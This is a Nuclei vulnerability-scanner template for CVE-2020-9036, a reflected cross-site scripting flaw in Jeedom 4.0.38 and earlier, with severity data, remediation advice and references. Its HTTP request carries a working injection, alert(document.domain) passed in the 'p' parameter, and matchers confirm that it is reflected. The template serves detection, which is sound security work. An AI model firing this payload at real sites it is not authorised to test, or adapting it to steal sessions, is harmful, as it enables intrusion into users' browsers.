nuclei-templates/http/cves/2020/CVE-2020-9036.yaml

52 lines
1.9 KiB
YAML

id: CVE-2020-9036
info:
name: Jeedom <=4.0.38 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability.
reference:
- https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9036
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/my3ker/my3ker-cve-workshop
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-9036
cwe-id: CWE-79
epss-score: 0.00113
epss-percentile: 0.43845
cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: jeedom
product: jeedom
tags: cve,cve2020,xss,jeedom
http:
- method: GET
path:
- "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100a2b80e81f9efe58be8ec0d3d891a2338f141a0fe35e0a84de0e7223200f8fdb3022100fa273979e8c86cdf5acb48a0e6efd5b42d10962dcd2b82e270dd8ca259d39c79:922c64590222798bb761d5b6d8e72950